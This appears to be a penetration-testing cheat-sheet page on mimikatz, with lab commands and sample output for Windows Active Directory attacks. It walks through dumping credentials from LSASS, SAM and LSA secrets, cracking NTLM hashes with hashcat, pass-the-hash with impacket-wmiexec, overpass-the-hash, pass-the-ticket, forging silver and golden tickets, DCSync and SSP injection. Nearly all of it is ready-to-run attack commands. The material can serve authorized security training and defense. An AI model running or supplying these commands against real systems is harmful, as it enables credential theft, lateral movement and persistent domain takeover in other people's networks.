mimikatz

Last updated 2 days ago

Was this helpful?

mimikatz

Each action has this format: module::command.
privilege::debug enables the SeDebugPrivilege.
token::elevate leverages the SeImpersonatePrivilege to gain SYSTEM.

Credential Attacks

Cached Creds

For more info about this attack, see and .

mimikatz # privilege::debug
Privilege '20' OK

Dump current logged-on users’ plaintext passwords, hashes, and tickets from memory:

mimikatz # sekurlsa::logonpasswords

Extract local user (NTML) hashes from the SAM database on the system:

mimikatz # token::elevate
mimikatz # lsadump::sam

Crack captured hashes:

hashcat -m1000 nelly_ntml /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

Retrieve cached secrets like Local Security Authority (LSA) secrets, stored credentials, service account passwords, and cached domain credentials from the LSA secrets storage:

mimikatz # lsadump::secrets

Module

Admin Rights

LSASS Access

Credential Guard Issue

Can Run Offline

sekurlsa::logonpasswords

✅ Yes

❌ No

lsadump::sam

✅ Yes

❌ No

✅ Yes

lsadump::secrets

✅ Yes

❌ No

✅ Yes

Lateral Movement

Pass-the-Hash

For more info about this attack, see .

mimikatz # privilege::debug
Privilege '20' OK

Domain hashes are stored in memory of the LSASS process.

mimikatz # sekurlsa::logonpasswords
<SNIP>

Authentication Id : 0 ; 5468350 (00000000:005370be)
Session           : RemoteInteractive from 5
User Name         : Administrator
Domain            : CORP
Logon Server      : SERVERWK248
Logon Time        : 9/19/2024 2:08:28 AM
SID               : S-1-5-21-1711441587-1152167230-1972296030-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : CORP
         * NTLM     : 160c0b16dd0ee77e7c494e38252f7ddf
<SNIP>

With the Domain Administrator's hash, we can perform the PtH attack.


$ impacket-wmiexec -debug -hashes :160c0b16dd0ee77e7c494e38252f7ddf CORP/Administrator@192.168.50.248
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*] SMBv3.0 dialect used
[+] Target system is 192.168.50.248 and isFQDN is False
[+] StringBinding: SERVERWK248[64285]
[+] StringBinding: 192.168.50.248[64285]
[+] StringBinding chosen: ncacn_ip_tcp:192.168.50.248[64285]
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>

Overpass-the-Hash

mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
...
NTLM : 369def79d8372408bf6e93364cc93075
...

Launch a session in the Kerberos ticket context of the target user.

mimikatz # sekurlsa::pth /user:jen /domain:corp.com /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell

Use a Kerberos-authenticated service, e.g. CIFS, to convert the NTML to a TGT.

# List cached tickets
> klist
...
Cached Tickets: (0)

# Kerberos-based authentication service
> net use \\files04
The command completed successfully.

# List cached tickets
> klist
...
Cached Tickets: (2)

#0>     Client: jen @ CORP.COM
        Server: krbtgt/CORP.COM @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 2/27/2023 5:27:28 (local)
        End Time:   2/27/2023 15:27:28 (local)
        Renew Time: 3/6/2023 5:27:28 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called: DC1.corp.com

#1>     Client: jen @ CORP.COM
        Server: cifs/files04 @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
        Start Time: 2/27/2023 5:27:28 (local)
        End Time:   2/27/2023 15:27:28 (local)
        Renew Time: 3/6/2023 5:27:28 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: DC1.corp.com

Use any Kerberbos-based authentication utility directly, such as PsExec.

.\PsExec.exe \\files04 cmd
...
C:\Windows\system32>whoami
corp\jen

C:\Windows\system32>hostname
FILES04

Pass-the-Ticket

privilege::debug
sekurlsa::tickets /export
...
Saved to file [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi

Find the relevant ticket.

> dir *.kirbi
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/14/2022   6:24 AM           1561 [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi
...

Inject it into the current session.

mimikatz # kerberos::ptt [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi

> klist
...
Cached Tickets: (1)

#0>     Client: dave @ CORP.COM
        Server: cifs/web04 @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40810000 -> forwardable renewable name_canonicalize
        Start Time: 9/14/2022 5:31:32 (local)
        End Time:   9/14/2022 15:31:13 (local)
        Renew Time: 9/21/2022 5:31:13 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:
        
> ls \\web04\backup
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/13/2022   2:52 AM              0 backup_schemata.txt

Silver Ticket

mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

User Name : iis_service
NTLM      : 4d28cf5252d39971419580a51484ca09
SID       : S-1-5-21-1987370270-658905905-1781884369-1109

mimikatz # kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:jeffadmin
Golden ticket for 'jeffadmin @ corp.com' successfully submitted for current session

# List cached tickets
> klist
Client: jeffadmin @ corp.com
Server: http/web04.corp.com @ corp.com
Ticket Flags: forwardable renewable pre_authent

# Exploit
> iwr -UseDefaultCredentials http://web04
StatusCode        : 200
StatusDescription : OK
...

DCSync

mimikatz # lsadump::dcsync /user:corp\dave
...
SAM Username         : dave
NTLM Hash            : 08d7a47a6f9f66b97b1bae4178747494
LM Hash              : 45bc7d437911303a42e764eaf8fda43e
...

$ hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
...
08d7a47a6f9f66b97b1bae4178747494:Flowers1

mimikatz # lsadump::dcsync /user:corp\Administrator
...
NTLM Hash: 2892d26cdf84d7a70e2eb3b9f05c425e

SSP Injection

mimikatz # misc::memssp
Injected =)

> type C:\Windows\System32\mimilsa.log
<SNIP>
[00000000:0066608e] CORP\Administrator  QWERTY123!@#
<SNIP>

Persistence

Golden Ticket

mimikatz # privilege::debug
mimikatz # lsadump::lsa /patch
...
User : krbtgt
NTLM : 1693c6cefafffc7af11ef34d1c788f47

Delete existing Kerberos tickets.

mimikatz # kerberos::purge

Create the GT.

mimikatz # kerberos::golden /user:jen /domain:corp.com /sid:S-1-5-21-... /krbtgt:1693c6cefafffc7af11ef34d1c788f47 /ptt
...
Golden ticket for 'jen @ corp.com' successfully submitted for current session

Launch a new session using the current security context.

mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF665F1B800

Exploit.

# Use hostname, not IP address as the latter forces NTML auth
> PsExec.exe \\dc1 cmd.exe

Mimikatz via WinRM

When using mimikatz via a WinRM session it won't run as expected because it’s launched in a non-interactive session. This prevents it from creating or accessing a console. This results in repeated prompts and no actual output. The solution to this issue is to run it with a non-interactive command:

*Evil-WinRM* PS C:\Users\eric.wallows\Documents> .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

Resources

Previousimpacket NextHounds

Last updated 2 days ago

Was this helpful?